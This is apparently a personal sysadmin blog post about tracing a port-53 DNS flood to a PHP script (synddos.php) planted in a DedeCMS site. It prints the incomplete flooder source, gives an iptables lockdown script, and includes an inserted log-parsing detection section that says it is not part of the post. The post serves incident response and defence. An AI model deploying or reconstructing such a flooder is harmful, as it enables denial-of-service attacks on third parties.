
resolved – port 53 dns flooding attack

April 13th, 2012

I found this port 53 DNS flooding attack when the server became very unstable. The NIC was blipping and networking just went down without the OS rebooting.

Using ntop as a detector, I found that DNS traffic was at a very high level (about 3Gb of traffic). Then I decided to forbid DNS traffic and only allow some usual ports.

  • Disable autoboot of iptables, in case something goes wrong with the new rules:


chkconfig iptables off


  • Here are the rules:

[root@doxer ~]# cat iptables-stop-flood.sh

iptables -F

#Note that DROP is different from REJECT: REJECT returns an error to the client (telnet shows "Connection refused"), while DROP silently discards the packet (telnet hangs at "Trying..." and finally returns "Connection timed out").
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP

#todo - allow no more than 5 new connections per second
#iptables -A INPUT -p tcp --syn -m limit --limit 5/s -i eth0 -j ACCEPT

# Allow traffic already established to continue
iptables -A INPUT -p all -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p all -m state --state INVALID -j DROP

#Allow ftp, http, mysql
#todo - without -m multiport, --dport or --sport takes only a single port or a range (low:high)
#todo - --ports matches if either the source or the destination port is in the list
iptables -A INPUT -p tcp -m multiport --dport 20,21,80,3306 -j ACCEPT
iptables -A OUTPUT -p tcp -m multiport --sport 20,21,80,3000,3306 -j ACCEPT

#Allow outgoing HTTP, e.g. telnet doxer 80
iptables -A OUTPUT -p tcp --dport 80 -j ACCEPT

#Allow ntop
iptables -A INPUT -p udp -m multiport --dport 3000 -j ACCEPT
iptables -A INPUT -p tcp -m multiport --dport 3000 -j ACCEPT

#Allow sftp (Simple File Transfer Protocol on port 115, not SSH File Transfer Protocol, which uses the SSH port)
iptables -A INPUT -p tcp --dport 115 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 115 -j ACCEPT

#Allow ssh in both directions
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp --sport 22 -j ACCEPT
iptables -A OUTPUT -p tcp --dport 22 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 22 -j ACCEPT

#allow rsync
iptables -A OUTPUT -p tcp --dport 873 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 873 -j ACCEPT
iptables -A INPUT -p tcp --sport 873 -j ACCEPT
iptables -A INPUT -p tcp --dport 873 -j ACCEPT

#allow ftp passive mode (you need to set the passive port range in vsftpd first)
iptables -A INPUT -p tcp --sport 21 -m state --state ESTABLISHED -j ACCEPT
iptables -A INPUT -p tcp --sport 20 -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p tcp --dport 35000:37000 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 35000:37000 -j ACCEPT

#Allow ping. ICMP echo request is type 8, echo reply is type 0
#allow other hosts to ping
iptables -A INPUT -p icmp --icmp-type 8 -m limit --limit 1/s -j ACCEPT
#iptables -A INPUT -p icmp --icmp-type 8 -j ACCEPT
iptables -A OUTPUT -p icmp --icmp-type 0 -j ACCEPT
#allow this host ping others
iptables -A INPUT -p icmp --icmp-type 0 -j ACCEPT
iptables -A OUTPUT -p icmp --icmp-type 8 -j ACCEPT

#allow dns query
#iptables -A OUTPUT -p udp --dport 53 -j ACCEPT
#iptables -A INPUT -p udp --sport 53 -j ACCEPT
#iptables -A OUTPUT -p tcp --dport 53 -j ACCEPT
#iptables -A INPUT -p tcp --sport 53 -j ACCEPT

# Allow local loopback services
iptables -A INPUT -i lo -j ACCEPT

#drop traffic from banned IPs listed in ban_ips.txt (one address per line)
for ip in `cat ban_ips.txt`; do
iptables -A INPUT -s $ip -j DROP
done

#save and restart iptables (after the ban list so it is persisted too)
/etc/init.d/iptables save
/etc/init.d/iptables restart


  • Run the rules:

chmod +x ./iptables-stop-flood.sh && ./iptables-stop-flood.sh

  • Enable autoboot of iptables

If everything is OK, enable autoboot of iptables:

chkconfig iptables on

After all these steps, DNS traffic dropped back to normal.


After several days' investigation, I finally found out that this attack was sourced from some worms (PHP worms?) embedded in DedeCMS's directory. Here's one file called synddos.php:

$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_REQUEST['time'];
$Sendlen = 65535;
$packets = 0;

if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
if (StrLen($_GET['rat'])<>0){
echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
echo "Warning to: opening";

$out .= "A";

$max_time = time()+$exec_time;

if(time() > $max_time){
$fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
fwrite($fp, $out);

echo "Send Host:$host:$port<br><br>";
echo "Send Flow:$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb<br><br>";
echo "Send Rate:" . round($packets/$exec_time, 2) . " packs/s;" . round($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s";

This is crazy! That explains why there was so much outgoing DNS traffic!
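Spotting this kind of outbound flood from kernel logs, as an added example that is not part of the post: it assumes an iptables LOG rule on outbound UDP/53 (not in the script above) and parses constructed log lines, flagging port-53 flows whose rate or average packet size is far beyond a normal resolver query.

```python
import re
from collections import defaultdict

# Regex over the kernel's iptables LOG format: the first LEN= is the IP total
# length; DPT= is absent on non-first fragments, which carry no UDP header.
LOG_RE = re.compile(
    r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) LEN=(?P<len>\d+).*?PROTO=(?P<proto>\S+)"
    r"(?:.*?DPT=(?P<dpt>\d+))?"
)

# Constructed sample lines (not captured from the post's server). Assumes a rule like
#   iptables -A OUTPUT -p udp --dport 53 -j LOG --log-prefix "OUTDNS "
# Ordinary resolver queries are tiny; the flooder's 65535-byte writes leave as
# MTU-sized fragments, so the IP LEN and UDP LEN fields give it away.
LEGIT = ("Apr 13 10:00:01 doxer kernel: OUTDNS IN= OUT=eth0 SRC=192.0.2.10 "
         "DST=192.0.2.53 LEN=71 TTL=64 ID={id} DF PROTO=UDP SPT=41000 DPT=53 LEN=51")
FLOOD = ("Apr 13 10:00:01 doxer kernel: OUTDNS IN= OUT=eth0 SRC=192.0.2.10 "
         "DST=198.51.100.7 LEN=1500 TTL=64 ID={id} MF PROTO=UDP SPT=52000 DPT=53 LEN=65515")
FRAG = ("Apr 13 10:00:01 doxer kernel: OUTDNS IN= OUT=eth0 SRC=192.0.2.10 "
        "DST=198.51.100.7 LEN=1500 TTL=64 ID=100 MF PROTO=UDP")
SAMPLE_LOG = "\n".join([LEGIT.format(id=i) for i in range(3)]
                       + [FLOOD.format(id=100 + i) for i in range(40)] + [FRAG])


def parse_log(text):
    """Aggregate UDP packets and IP bytes per (src, dst, dport) flow;
    later fragments have no DPT and are filed under dport 0."""
    flows = defaultdict(lambda: {"packets": 0, "bytes": 0})
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if not m or m.group("proto") != "UDP":
            continue
        key = (m.group("src"), m.group("dst"), int(m.group("dpt") or 0))
        flows[key]["packets"] += 1
        flows[key]["bytes"] += int(m.group("len"))
    return flows


def find_dns_floods(flows, window_s, max_pps=20, max_avg_len=512):
    """Flag port-53 flows that are too fast or carry packets far larger than a
    DNS query (512 bytes); either condition alone reports the flow."""
    suspects = []
    for (src, dst, dpt), st in flows.items():
        if dpt != 53:
            continue
        pps = st["packets"] / window_s
        avg_len = st["bytes"] / st["packets"]
        if pps > max_pps or avg_len > max_avg_len:
            suspects.append({"src": src, "dst": dst, "pps": pps, "avg_len": avg_len})
    return suspects
```

Run `find_dns_floods(parse_log(SAMPLE_LOG), window_s=1)` to see the flood flow reported while the three real queries pass.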

To cure this weakness:

1. Disable the fsockopen function in php.ini:

disable_functions = fsockopen

2. In the .htaccess file, block PHP scripts from running in the upload, data and template directories:

RewriteEngine on
RewriteCond % !^$
RewriteRule uploads/(.*)\.php$ - [F]
RewriteRule data/(.*)\.php$ - [F]
RewriteRule templets/(.*)\.php$ - [F]

Good Luck!
